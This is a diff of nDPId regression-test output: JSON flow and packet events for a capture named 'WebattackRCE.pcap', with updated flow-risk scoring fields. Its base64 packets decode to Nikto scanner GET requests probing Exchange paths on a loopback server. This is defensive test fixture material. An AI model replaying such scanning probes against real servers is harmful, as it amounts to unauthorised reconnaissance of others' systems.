+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7440000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7440000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":159,"midstream":1,"ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00660{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00681{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7440000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":157,"midstream":1,"ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00652{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":204,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":204,"pkt_l4_len":170,"ts_msec":1576420276781,"pkt":"AAAAAAAAAAAAAAAACABFAAC+Y8xAAEAG2Gt\/AAABfwAAAcIiH5D+h1vitMrGVIAYAED+sgAAAQEICp1m+1WdZvtVR0VUIC9FeGNoYW5nZSBIVFRQLzEuMA0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCg0K"}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276781,"flow_last_seen":1576420276781,"flow_idle_time":7440000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":1,"ts_msec":1576420276781,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"ts_msec":1576420276784,"pkt":"AAAAAAAAAAAAAAAACABFAAC5ylFAAEAGcet\/AAABfwAAAcIkH5CUkvJkMc1am4AYAED+rQAAAQEICp1m+1idZvtYR0VUIC9PV0EgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
-00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276784,"flow_last_seen":1576420276784,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"ts_msec":1576420276784,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276786,"flow_last_seen":1576420276786,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"ts_msec":1576420276786,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
